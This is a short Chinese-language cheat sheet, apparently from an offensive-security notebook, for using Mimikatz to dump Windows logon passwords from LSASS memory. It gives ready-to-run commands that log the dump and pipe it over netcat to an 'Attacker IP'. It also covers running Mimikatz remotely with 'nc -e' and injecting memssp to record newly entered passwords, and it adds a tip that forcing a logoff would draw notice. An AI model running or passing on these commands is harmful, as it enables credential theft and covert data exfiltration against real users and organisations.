1.記錄 Mimikatz輸出: C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir
2.將輸出導入到本地文件: C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
3.將輸出傳輸到遠程機器:
Attacker執行: E:\>nc -lvp 4444
Victim執行: C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.52.1 4444
192.168.52.1 為Attacker IP
4.通過nc遠程執行Mimikatz:
Victim執行: C:\>nc -lvp 443
Attacker執行: E:\>nc.exe -vv 192.168.52.128 443 -e mimikatz.exe
192.168.52.128 為Victim IP
若管理員有每過幾天就改密碼的習慣,但是mimikatz抓取到的密碼都是老密碼
用QuarksPwDump等抓的hash也是老hash,新密碼卻抓不到的情況下
可以使用以下方法嘗試解決
privilege::debug
misc::memssp
記錄的結果在c:\windows\system32\mimilsa.log
每次驗證都會記錄 如 鎖屏 等 重啟失效
出現如上問題是因為管理一直沒注銷過,都是直接斷開連接,lsass進程里面還吃存放的老的。
也可以直接logoff,但是這樣會很明顯。